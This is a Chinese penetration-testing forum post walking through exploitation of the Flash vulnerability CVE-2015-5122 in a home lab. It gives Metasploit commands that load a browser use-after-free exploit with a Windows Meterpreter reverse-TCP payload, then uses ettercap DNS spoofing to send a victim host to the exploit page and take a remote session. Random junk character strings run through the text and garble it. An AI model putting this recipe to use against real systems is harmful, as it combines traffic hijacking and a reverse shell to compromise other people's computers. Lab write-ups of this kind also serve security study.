中国网络渗透测试联盟

标题: cve2015-5122漏洞实例演示虚拟机 [打印本页]

作者: admin 时间: 2018-10-20 20:28
标题: cve2015-5122漏洞实例演示虚拟机

% ?- c! n; ^; p& s0 |. d 二、cve2015-5122漏洞实例演示虚拟机 / O1 \+ l5 j4 P- M; S

3 x! @1 i0 P6 X) R 关于cve2015-5122这个漏洞，大家可以百度一下，是关于flash的漏洞，是2015年flash漏洞的第二发，今天我们就用这个漏洞来演示，开启kai linux msfconsole命令启动msf如图： + `: G0 A9 Q+ s5 e# }

; J% \& S7 }. d! I, r. c; c search cve-2015-5122如图： ' {% f. r; B4 k, d

0 g4 \/ D0 q1 u! M6 U& r4 e( r% R0 B ; ]& u7 l/ I3 V7 U3 R; U

2 D! C5 M I7 T% N 下面我们敲如下命令： a$ ?4 x, @; L0 s" r% ^- r" @8 z

: L+ K |1 M7 {; o9 D; E% ~4 K9 H use exploit/multi/browser/adobe_flash_opaque_background_uaf : }5 Q' e* z/ ~/ t

$ H- e) M: e0 g/ M% M% Z1 S" ] set PAYLOAD windows/meterpreter/reverse_tcp 1 r% ~* X1 b+ d0 [# S

. M! T( Z& f! o/ Q! x2 H, O8 \ set LHOST 192.168.0.109 2 k# h7 t' O4 b# k# v+ @

F0 r9 M1 n t7 q3 t set URIPATH / /*根目录*/ 3 b% G; a/ F) P4 B/ N

6 O& O" n0 q% D# Y C set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址 6 W2 g. m9 [% }( X

& v& J& `- I, |5 E: ^ set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 % r p9 J8 m: c

2 l' d$ M& U) x6 L/ j 然后show options如图： " {- Q8 z8 v& U1 m

$ ?5 @, @$ H$ i$ V' f5 s8 o, e / \; g0 g" e, L# V( X1 k2 k3 ]

) Q' I0 [- I* V5 a 一切都设置好了，执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图：
3 t- M% q, v; e4 m( | W ( z% F7 g k8 l* U

$ P, U6 e9 z0 b! f" e/ n! {* J4 i 然后ettercap -G命令打开ettercap，我们要攻击的主机ip是192.168.0。115 5 w; k3 U8 F/ v

2 h! f+ x9 x/ Y/ B5 c Ettercap过程第一篇里已经演示，这里不在详细写了。。。执行完ettercap以后我们观察一下msf ; R3 q, I1 S: o/ f

" H- A( h% ~6 z* y5 K# t) ~ 6 H3 `1 f4 D: L) @; ?& M

" n4 R& ]! T7 a* `2 h 成功了，这时候我们断开ettercap，如图： 0 s( ]# y/ [- s2 A: i

# _8 }" i" `: \% Q ) U4 p; H5 ^% {5 |* v8 F! w3 [

; b2 M. V% p2 Z d7 n- z1 H Screenshot如图： " l/ A Z: v3 n& g- A- v2 ?" \

1 \; e" ]; N2 i+ [6 Y 0 C" B* C3 j! l4 a; w

2 }: o& N- r% @5 G3 f: z 7 s( ~3 D! B/ S0 {% W

欢迎光临中国网络渗透测试联盟 (https://cobjon.com/)